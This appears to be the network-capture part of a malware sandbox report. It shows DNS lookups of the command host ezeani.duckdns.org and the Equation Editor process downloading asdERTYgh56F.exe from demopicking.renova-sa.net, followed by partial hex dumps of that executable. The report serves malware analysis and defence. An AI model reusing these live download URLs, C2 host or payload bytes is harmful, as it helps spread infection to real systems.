Oct 13, 2021 10:00:18.795478106 CEST	192.168.2.22	8.8.8.8	0xc8ce	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:24.019435883 CEST	192.168.2.22	8.8.8.8	0x360f	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:24.136451960 CEST	192.168.2.22	8.8.8.8	0x360f	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:29.338015079 CEST	192.168.2.22	8.8.8.8	0x7497	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:49.979460001 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.094465017 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.208348036 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.324213982 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.343091965 CEST	192.168.2.22	8.8.8.8	0xcf81	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:55.547637939 CEST	192.168.2.22	8.8.8.8	0x473f	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.741380930 CEST	192.168.2.22	8.8.8.8	0x6b19	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.862250090 CEST	192.168.2.22	8.8.8.8	0x6b19	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.880924940 CEST	192.168.2.22	8.8.8.8	0x6b19	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.994884014 CEST	192.168.2.22	8.8.8.8	0x6b19	Standard query (0)	ezeani.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Oct 13, 2021 09:59:21.293992043 CEST	8.8.8.8	192.168.2.22	0x19fc	No error (0)	demopicking.renova-sa.net	97.107.138.110	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:47.354701996 CEST	8.8.8.8	192.168.2.22	0x6e3a	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:47.374175072 CEST	8.8.8.8	192.168.2.22	0x6e3a	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:52.887907028 CEST	8.8.8.8	192.168.2.22	0x5435	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:58.147654057 CEST	8.8.8.8	192.168.2.22	0xfefa	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 09:59:58.166407108 CEST	8.8.8.8	192.168.2.22	0xfefa	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:18.814081907 CEST	8.8.8.8	192.168.2.22	0xc8ce	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:24.135766983 CEST	8.8.8.8	192.168.2.22	0x360f	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:24.155626059 CEST	8.8.8.8	192.168.2.22	0x360f	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:29.356427908 CEST	8.8.8.8	192.168.2.22	0x7497	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.093735933 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.207654953 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.323592901 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.342456102 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:50.361336946 CEST	8.8.8.8	192.168.2.22	0xcf81	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:00:55.566097975 CEST	8.8.8.8	192.168.2.22	0x473f	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.854655981 CEST	8.8.8.8	192.168.2.22	0x6b19	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.880428076 CEST	8.8.8.8	192.168.2.22	0x6b19	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:00.994245052 CEST	8.8.8.8	192.168.2.22	0x6b19	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)
Oct 13, 2021 10:01:01.012785912 CEST	8.8.8.8	192.168.2.22	0x6b19	No error (0)	ezeani.duckdns.org	194.5.98.48	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

demopicking.renova-sa.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49166	97.107.138.110	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49165	97.107.138.110	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 09:59:21.414997101 CEST	0	OUT	GET /asdERTYgh56F.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: demopicking.renova-sa.net Connection: Keep-Alive
Oct 13, 2021 09:59:21.515645027 CEST	1	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 13 Oct 2021 07:59:20 GMT Server: Apache Location: https://demopicking.renova-sa.net/asdERTYgh56F.exe Content-Length: 258 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6d 6f 70 69 63 6b 69 6e 67 2e 72 65 6e 6f 76 61 2d 73 61 2e 6e 65 74 2f 61 73 64 45 52 54 59 67 68 35 36 46 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://demopicking.renova-sa.net/asdERTYgh56F.exe">here</a>.</p></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49166	97.107.138.110	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
2021-10-13 07:59:22 UTC	0	OUT	GET /asdERTYgh56F.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: demopicking.renova-sa.net
2021-10-13 07:59:22 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 07:59:21 GMT Server: Apache Last-Modified: Wed, 13 Oct 2021 01:25:21 GMT Accept-Ranges: bytes Content-Length: 1073384 Connection: close Content-Type: application/x-msdownload
2021-10-13 07:59:22 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 62 60 f7 f7 26 01 99 a4 26 01 99 a4 26 01 99 a4 92 9d 68 a4 2b 01 99 a4 92 9d 6a a4 ab 01 99 a4 92 9d 6b a4 3e 01 99 a4 b8 a1 5e a4 24 01 99 a4 1d 5f 9a a5 30 01 99 a4 1d 5f 9d a5 35 01 99 a4 1d 5f 9c a5 0a 01 99 a4 2f 79 1a a4 2c 01 99 a4 2f 79 0a a4 23 01 99 a4 26 01 98 a4 2c 00 99 a4 b1 5f 9c a5 17 01 99 a4 b1 5f 99 a5 27 01 99 a4 b4 5f 66 a4 27 01 99 a4 b1 5f 9b a5 27 01 99 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b`&&&h+jk>^$_0_5_/y,/y#&,__'_f'_'
2021-10-13 07:59:22 UTC	8	IN	Data Raw: 00 66 89 86 04 11 00 00 83 ff 02 74 0a 39 4e 24 7d 05 33 c0 40 eb 02 8b c1 88 86 f8 10 00 00 8b 46 08 c1 e8 08 24 01 88 86 f9 10 00 00 74 2c 8d 4d 24 e8 47 97 00 00 8d 4d 24 8b f8 e8 3d 97 00 00 83 7d 54 ff 8b d0 75 0c 83 fa ff 75 07 33 c0 40 33 c9 eb 11 33 c9 8b c1 eb 0b 83 7d 54 ff 8b d1 8b f9 0f 94 c0 88 86 9a 10 00 00 33 c0 03 46 14 89 86 58 10 00 00 13 f9 33 c0 03 45 54 89 be 5c 10 00 00 13 d1 89 86 60 10 00 00 80 be 9a 10 00 00 00 89 96 64 10 00 00 74 11 b8 ff ff ff 7f 89 86 60 10 00 00 89 86 64 10 00 00 8b 45 4c bf ff 1f 00 00 89 7d 54 3b c7 73 05 8b f8 89 45 54 57 8d 85 d0 df ff ff 50 8d 4d 24 e8 10 97 00 00 33 c0 83 7d 50 02 88 84 3d d0 df ff ff 75 76 33 c9 8d 7e 28 66 89 0f f7 46 08 00 02 00 00 74 3f 8d 4d 00 e8 c8 3d 00 00 8d 85 d0 df ff ff 50 Data Ascii: ft9N$}3@F$t,M$GM$=}Tuu3@33}T3FX3ET\`dt`dEL}T;sETWPM$3}P=uv3~(fFt?M=P
2021-10-13 07:59:22 UTC	16	IN	Data Raw: 66 0f 6e ca 66 0f ef c5 66 0f 62 ca 0f 28 e0 66 0f 72 d0 0c 66 0f 72 f4 14 66 0f ef e0 66 0f 6e 44 24 2c 66 0f 62 d8 0f 28 44 24 60 66 0f 62 d9 66 0f fe df 66 0f 6e f8 66 0f fe dc 66 0f ef c3 0f 29 5c 24 50 0f 28 d8 66 0f 72 d0 08 66 0f 72 f3 18 66 0f ef d8 0f 28 d3 66 0f 70 db 39 66 0f fe d6 0f 28 c2 66 0f ef c4 66 0f 70 e2 4e 0f 28 c8 66 0f 6e d2 66 0f 72 d0 07 66 0f 72 f1 19 66 0f ef c8 66 0f 6e 44 24 24 66 0f 62 f8 66 0f 70 e9 93 66 0f 6e 4c 24 18 66 0f 62 ca 66 0f 62 f9 66 0f fe 7c 24 50 66 0f 6e 4c 24 14 66 0f fe fd 66 0f ef df 66 0f 6e d7 0f 28 c3 66 0f 62 ca 66 0f 72 d0 10 66 0f 72 f3 10 66 0f ef c3 66 0f 6e 5c 24 2c 0f 28 f0 0f 29 44 24 60 66 0f fe f4 0f 28 c6 66 0f ef c5 0f 28 e0 66 0f 72 d0 0c 66 0f 72 f4 14 66 0f ef e0 66 0f 6e 44 24 20 66 0f Data Ascii: fnffb(frfrffnD$,fb(D$`fbffnff)\$P(frfrf(fp9f(ffpN(fnfrfrffnD$$fbfpfnL$fbfbf\|$PfnL$fffn(fbfrfrffn\$,()D$`f(f(frfrffnD$ f
2021-10-13 07:59:22 UTC	23	IN	Data Raw: 01 00 83 c6 04 83 c4 0c 83 fe 0c 72 90 6a 44 8d 45 bc 50 e8 9f 7f 00 00 53 8d 45 00 50 e8 95 7f 00 00 53 8d 45 20 50 e8 8b 7f 00 00 53 8d 45 9c 50 e8 81 7f 00 00 5f 5e 5b 8d 65 58 5d c2 20 00 33 c0 88 41 04 89 41 08 89 41 0c 89 41 10 8b c1 c3 83 ec 0c 53 8b 5c 24 1c 55 8b 6c 24 24 56 57 33 f6 89 4c 24 18 33 ff 85 ed 74 09 8a 03 46 88 44 24 12 eb 05 c6 44 24 12 00 8b 44 24 34 3b f5 0f 83 fb 00 00 00 8d 56 01 89 54 24 14 3b f8 0f 83 f0 00 00 00 83 79 08 00 75 1b 3b f5 0f 83 de 00 00 00 8a 04 1e 46 42 88 41 04 89 54 24 14 c7 41 08 08 00 00 00 0f b6 41 04 c1 e8 06 83 e8 00 0f 84 62 01 00 00 83 e8 01 0f 84 2c 01 00 00 83 e8 01 0f 84 f3 00 00 00 83 e8 01 0f 85 88 00 00 00 3b f5 0f 83 80 00 00 00 0f b6 1c 1e 46 42 89 54 24 14 84 db 0f 89 a1 00 00 00 3b f5 73 6a Data Ascii: rjDEPSEPSE PSEP_^[eX] 3AAAAS\$Ul$$VW3L$3tFD$D$D$4;VT$;yu;FBAT$AAb,;FBT$;sj
2021-10-13 07:59:22 UTC	31	IN	Data Raw: 84 8d 00 00 00 83 f8 05 0f 84 84 00 00 00 8a 4d 0f 8b 75 e8 84 c9 0f 84 fd 00 00 00 66 3b f2 0f 84 eb 00 00 00 8b 47 08 80 b8 f9 61 00 00 00 0f 85 db 00 00 00 33 c0 88 45 f1 8d 87 f6 10 00 00 50 e8 45 15 00 00 84 c0 74 35 80 7d f1 00 75 39 33 c9 8d 83 c0 32 00 00 51 50 ff b3 e4 32 00 00 8d 45 f1 ff b3 e0 32 00 00 50 68 00 08 00 00 8d 87 f6 10 00 00 50 51 ff 77 08 e8 3d 08 00 00 80 7d f1 00 0f 84 84 00 00 00 33 c0 8a c8 88 4d 0f eb 7e 8b cb e8 8c 96 ff ff 84 c0 74 50 80 7d 0f 00 0f 84 9e 00 00 00 8b 45 e8 66 83 f8 50 0f 84 91 00 00 00 6a 49 59 66 3b c1 0f 84 85 00 00 00 6a 45 59 66 3b c1 74 7d 8b 47 08 33 c9 41 39 88 58 61 00 00 74 6f ff 87 e4 00 00 00 8d 85 c4 ee ff ff 50 53 8b cf e8 d0 f3 ff ff eb 58 8a 4d 0f 84 c9 74 22 8d 85 a0 de ff ff 8b cf 50 53 e8 Data Ascii: Muf;Ga3EPEt5}u932QP2E2PhPQw=}3M~tP}EfPjIYf;jEYf;t}G3A9XatoPSXMt"PS
2021-10-13 07:59:22 UTC	39	IN	Data Raw: 02 75 11 ff 75 0c ff 75 08 ff 76 04 e8 4d b5 ff ff 89 46 04 83 3e 03 75 5c 83 7e 10 01 76 30 57 33 ff 39 7e 0c 75 27 68 38 03 00 00 e8 db 2f 01 00 59 89 45 f0 89 7d fc 85 c0 74 0b 6a 08 8b c8 e8 c1 5a 00 00 8b f8 83 4d fc ff 89 7e 0c 5f 8b 4e 08 8b 46 0c ff 75 0c ff 75 08 89 81 4c 0b 00 00 8b 4e 08 8b 46 10 89 81 50 0b 00 00 ff 76 08 e8 c4 af ff ff 8b 4d f4 5e 64 89 0d 00 00 00 00 8b e5 5d c2 08 00 8b c1 f7 d0 40 83 e0 3f 03 c1 89 81 f0 00 00 00 83 e8 80 89 81 f4 00 00 00 83 c0 20 89 81 f8 00 00 00 83 c0 08 89 81 fc 00 00 00 c3 53 56 ff 74 24 0c 8b f1 8d 8e 28 10 00 00 e8 f9 75 ff ff 33 db 8d 8e 70 10 00 00 53 88 5e 10 e8 98 fe ff ff 89 9e 40 10 00 00 89 9e 44 10 00 00 89 9e 50 10 00 00 89 9e 54 10 00 00 89 9e 48 10 00 00 89 9e 4c 10 00 00 89 9e 98 10 00 Data Ascii: uuuvMF>u\~v0W39~u'h8/YE}tjZM~_NFuuLNFPvM^d]@? SVt$(u3pS^@DPTHL
2021-10-13 07:59:22 UTC	47	IN	Data Raw: c4 0c 89 6e 04 8b 6c 24 20 e9 98 00 00 00 8b 4e 24 3b e9 7c 0c 7f 05 3b 5e 20 76 05 8b 6e 20 eb 02 8b eb 85 ed 74 7d 80 7e 4f 00 74 27 80 be cd 00 00 00 00 74 1e 33 ff 3b f9 7c 18 7f 05 3b 5e 20 76 11 03 c5 8b c8 83 e1 f0 2b c8 03 cd 85 c9 7e 02 8b e9 8b 02 8b ca ff 50 18 84 c0 0f 84 a6 00 00 00 8b 4e 2c 55 ff 74 24 14 8b 01 ff 50 0c 8b 6c 24 20 8b f8 8b 46 38 85 c0 75 06 8d 85 80 22 00 00 80 7e 2b 00 75 1d 80 b8 99 10 00 00 00 74 14 57 ff 74 24 14 8d 8e 90 00 00 00 e8 0e e0 ff ff eb 02 8b ea 8b 4c 24 14 8b c7 99 01 46 70 11 56 74 03 cf 01 7c 24 10 2b df 29 46 20 89 4c 24 14 19 56 24 80 7e 4f 00 74 43 8b 46 20 0b 46 24 75 3b 85 ff 74 0d 38 86 cd 00 00 00 74 2f f6 c1 0f 74 2a 0f b7 46 4c 50 6a 01 56 55 e8 7e b8 00 00 84 c0 74 0f 85 db 74 14 8b 44 24 14 33 Data Ascii: nl$ N$;\|;^ vn t}~Ot't3;\|;^ v+~PN,Ut$Pl$ F8u"~+utWt$L$FpVt\|$+)F L$V$~OtCF F$u;t8t/t*FLPjVU~ttD$3
2021-10-13 07:59:22 UTC	55	IN	Data Raw: d6 7d 2a 8d 44 24 18 8d 04 90 89 44 24 3c 83 ff 04 7d 1d 8b 00 8d 0c 9f 89 44 8d 18 42 8b 44 24 3c 83 c0 04 47 89 44 24 3c 3b d6 7c e1 83 ff 04 75 03 43 33 ff 3b d6 7c c1 3b 5d 04 8b 54 24 14 0f 8e b1 fe ff ff 5f 5e 5d 5b 83 c4 28 c2 04 00 56 8b f1 68 e4 22 43 00 c6 86 01 01 00 00 00 e8 08 02 00 00 8b c6 5e c3 56 8b f1 83 3e 00 74 08 ff 36 ff 15 88 20 43 00 33 c0 89 06 89 46 08 89 46 0c 5e c3 e9 6e 00 00 00 55 8b ec 81 ec 00 02 00 00 8d 85 00 ff ff ff 53 56 be 80 00 00 00 56 50 e8 64 00 00 00 8b 4d 08 8d 85 00 fe ff ff 56 50 e8 54 00 00 00 8d 85 00 fe ff ff 50 8d 85 00 ff ff ff 50 e8 00 44 01 00 59 8b d8 8d 85 00 ff ff ff 59 f7 db 56 1a db 50 fe c3 e8 d7 01 00 00 56 8d 85 00 fe ff ff 50 e8 ca 01 00 00 5e 8a c3 5b 8b e5 5d c2 04 00 68 00 01 00 00 51 c6 81 Data Ascii: }*D$D$<}DBD$<GD$<;\|uC3;\|;]T$_^][(Vh"C^V>t6 C3FF^nUSVVPdMVPTPPDYYVPVP^[]hQ
2021-10-13 07:59:22 UTC	63	IN	Data Raw: 74 04 32 c0 eb 45 56 8d b7 20 03 00 00 56 ff 15 cc 20 43 00 8b 97 10 03 00 00 8b 4c 24 0c 56 8b 84 d7 0c 01 00 00 89 01 8b 84 d7 10 01 00 00 89 41 04 8b 87 10 03 00 00 40 83 e0 3f 89 87 10 03 00 00 ff 15 d0 20 43 00 b0 01 5e 5f c2 04 00 8b 4c 24 04 e8 05 00 00 00 33 c0 c2 04 00 55 8b ec 51 51 56 8d 45 f8 8b f1 50 e8 7d ff ff ff 84 c0 74 40 57 8d be 20 03 00 00 ff 75 fc ff 55 f8 57 ff 15 cc 20 43 00 83 ae 08 01 00 00 01 75 0c ff b6 1c 03 00 00 ff 15 d8 20 43 00 57 ff 15 d0 20 43 00 8d 45 f8 8b ce 50 e8 3e ff ff ff 84 c0 75 c8 5f 5e 8b e5 5d c3 56 8b f1 83 be 08 01 00 00 00 74 2b ff b6 1c 03 00 00 ff 15 dc 20 43 00 6a 00 ff b6 08 01 00 00 ff b6 18 03 00 00 ff 15 e0 20 43 00 ff b6 1c 03 00 00 e8 ec fd ff ff 5e c3 8b 44 24 04 01 01 8b 44 24 08 11 41 04 c2 08 Data Ascii: t2EV V CL$VA@? C^_L$3UQQVEP}t@W uUW Cu CW CEP>u_^]Vt+ Cj C^D$D$A
2021-10-13 07:59:22 UTC	70	IN	Data Raw: 8b 54 24 04 8b 81 58 4c 00 00 81 c1 64 e6 00 00 52 89 42 1c e8 31 95 ff ff c2 04 00 55 56 8b 74 24 10 57 8b f9 0f b6 6c 3e 29 0f b6 44 3e 2a 3b e8 75 06 8b 44 24 10 eb 35 53 8d 46 01 50 e8 d4 f8 ff ff 8b d8 85 db 74 22 6b ce 0c 8b 74 24 14 51 56 53 e8 08 c5 00 00 8b 84 af b8 00 00 00 83 c4 0c 89 06 89 b4 af b8 00 00 00 8b c3 5b 5f 5e 5d c2 08 00 56 8b 74 24 08 8d 91 80 00 00 00 33 c0 3b 32 72 0d 40 83 c2 04 83 f8 20 72 f3 33 c0 eb 13 8b 84 81 80 00 00 00 2b c6 3b 44 24 0c 72 04 8b 44 24 0c 5e c2 08 00 56 8b f1 8b 4e 04 81 f9 e2 7f 00 00 7e 16 8b ce e8 44 1e 00 00 8b 4e 04 81 f9 00 80 00 00 7c 04 33 c0 5e c3 8b 46 10 0f b6 04 08 41 89 4e 04 5e c3 83 ec 0c 53 56 8b f1 33 db 57 8b 86 b0 00 00 00 3b 86 b4 00 00 00 74 02 88 18 8d 44 24 0c 8b fb 55 89 44 24 18 Data Ascii: T$XLdRB1UVt$Wl>)D>*;uD$5SFPt"kt$QVS[_^]Vt$3;2r@ r3+;D$rD$^VN~DN\|3^FAN^SV3W;tD$UD$
2021-10-13 07:59:22 UTC	78	IN	Data Raw: 50 51 e8 d9 c9 00 00 83 c4 0c 89 5e 04 89 be 84 00 00 00 eb 02 8b f9 b8 00 80 00 00 3b f8 74 1c 8b 0e 2b c7 50 8b 46 10 03 c7 50 e8 7f 82 ff ff 8b d8 85 db 7e 06 01 9e 84 00 00 00 80 be 45 4c 00 00 00 8b 86 84 00 00 00 8d 48 e2 89 8e 88 00 00 00 74 0b 05 0c fe ff ff 89 86 88 00 00 00 8b 8e 8c 00 00 00 8b 46 04 89 86 94 00 00 00 83 f9 ff 74 15 48 03 c8 8b 86 88 00 00 00 3b c1 7c 02 8b c1 89 86 88 00 00 00 83 fb ff 5b 0f 95 c0 5f 5e c3 53 55 8b 6c 24 0c 8b d9 57 8b 7c 24 14 3b fd 74 10 c6 83 52 4c 00 00 01 73 07 c6 83 51 4c 00 00 01 80 bb 44 4c 00 00 00 74 46 2b fd 23 bb dc e6 00 00 76 73 8d 83 44 4b 00 00 56 57 55 8b c8 e8 5e e0 ff ff 8b f0 8d 8b 44 4b 00 00 56 55 e8 60 d2 ff ff 50 8b cb e8 5c 05 00 00 03 ee 8d 83 44 4b 00 00 23 ab dc e6 00 00 2b fe 75 ce Data Ascii: PQ^;t+PFP~ELHtFtH;\|[_^SUl$W\|$;tRLsQLDLtF+#vsDKVWU^DKVU`P\DK#+u
2021-10-13 07:59:22 UTC	86	IN	Data Raw: d0 4a 00 00 88 4f 14 88 4f 2c 8b 4c 24 1c 83 7c 24 2c 00 c6 87 d3 4a 00 00 00 0f 94 c0 89 8f e0 4a 00 00 80 7f 14 00 88 87 d2 4a 00 00 75 31 8d 47 18 c6 47 14 01 50 8d 47 04 8b cb 50 e8 f1 cf ff ff 84 c0 74 79 80 7f 29 00 75 09 80 bb 62 e6 00 00 00 74 6a 8b 4c 24 1c c6 83 62 e6 00 00 01 80 7c 24 13 00 75 0f 81 7f 18 00 00 02 00 7f 06 ff 44 24 14 eb 0c c6 87 d1 4a 00 00 01 c6 44 24 13 01 8b 47 24 81 c5 e4 4a 00 00 03 47 18 8b 54 24 18 03 d0 41 8b c6 89 54 24 18 2b c2 89 4c 24 1c 78 06 80 7f 28 00 75 1b 3d 00 04 00 00 7c 14 8b 43 1c 03 c0 3b c8 0f 82 f9 fe ff ff eb 05 c6 44 24 12 01 8b 4c 24 14 33 d2 8b c1 f7 73 1c 8b f8 85 d2 74 01 47 33 ed 85 c9 74 64 33 d2 8d 74 24 34 69 c7 e4 4a 00 00 89 54 24 24 89 44 24 30 8b 44 24 14 8b ce 03 53 18 2b c5 83 c6 08 89 Data Ascii: JOO,L$\|$,JJJu1GGPGPty)ubtjL$b\|$uD$JD$G$JGT$AT$+L$x(u=\|C;D$L$3stG3td3t$4iJT$$D$0D$S+
2021-10-13 07:59:22 UTC	94	IN	Data Raw: b4 8d 44 24 24 50 6a 45 e8 5f 90 fe ff ff 74 24 14 8b 06 8d 4e 1e 51 8b ce ff 50 04 8b 06 8b ce 6a 00 ff 74 24 20 ff 74 24 28 ff 50 10 32 c0 e9 94 00 00 00 e8 01 b6 fe ff 83 be dc 21 00 00 02 75 2a 8b ce e8 f2 9b fe ff 8b 8e a8 6c 00 00 2b 8e d8 32 00 00 8b 86 ac 6c 00 00 1b 86 dc 32 00 00 8b 16 6a 00 50 51 8b ce ff 52 10 85 ff 74 56 83 fd 05 75 06 c6 47 4f 00 eb 1b 8a 83 99 10 00 00 88 47 4f 8b 83 58 10 00 00 89 47 20 8b 83 5c 10 00 00 89 47 24 8b ce e8 64 13 ff ff 83 67 70 00 8d 8f 90 00 00 00 83 67 74 00 89 47 58 8b 44 24 18 89 57 5c ff b0 d8 82 00 00 ff b3 70 10 00 00 e8 82 23 ff ff b0 01 5f 5e 5d 5b 81 c4 14 20 00 00 c2 10 00 56 8b f1 33 c0 6a 10 50 89 46 18 89 46 1c 8d 46 20 50 c7 06 98 30 43 00 c7 46 04 bc 30 43 00 c7 46 08 f8 30 43 00 c7 46 0c 34 Data Ascii: D$$PjE_t$NQPjt$ t$(P2!u*l+2l2jPQRtVuGOGOXG \G$dgpgtGXD$W\p#_^][ V3jPFFF P0CF0CF0CF4
2021-10-13 07:59:22 UTC	102	IN	Data Raw: 60 21 43 00 ff b4 24 2c 20 00 00 8d 44 24 18 50 57 e8 7b 58 ff ff 33 c0 66 89 03 5f 8b c6 5d eb 02 33 c0 5e 5b 81 c4 04 20 00 00 c2 18 00 55 8b ec 51 51 53 8d 45 f8 50 ff 15 08 df 43 00 8d 45 fc 50 33 c0 50 50 ff 75 0c 50 ff 15 fc de 43 00 8b d8 f7 db 1a db 80 c3 01 74 22 ff 75 08 ff 75 fc ff 15 10 df 43 00 ff 75 fc 48 f7 d8 1a c0 8d 58 01 8b 45 f8 50 8b 08 ff 51 14 eb 08 8b 45 08 33 c9 66 89 08 8a c3 5b 8b e5 5d c2 08 00 b8 04 20 00 00 e8 88 36 00 00 53 55 56 57 68 00 00 08 00 e8 8d 88 00 00 8b f0 59 85 f6 75 0a b9 e0 00 44 00 e8 63 ca fe ff 8b 9c 24 18 20 00 00 33 c0 33 ed 66 89 06 8b fd eb 6e 66 39 2e 75 08 66 83 7c 24 14 7b 74 61 66 83 7c 24 14 7d 74 7b 8d 44 24 14 50 e8 2b 88 00 00 03 c7 59 3d fb ff 03 00 77 67 8d 44 24 14 50 56 e8 d0 c3 00 00 56 e8 Data Ascii: `!C$, D$PW{X3f_]3^[ UQQSEPCEP3PPuPCt"uuCuHXEPQE3f[] 6SUVWhYuDc$ 33fnf9.uf\|${taf\|$}t{D$P+Y=wgD$PVV
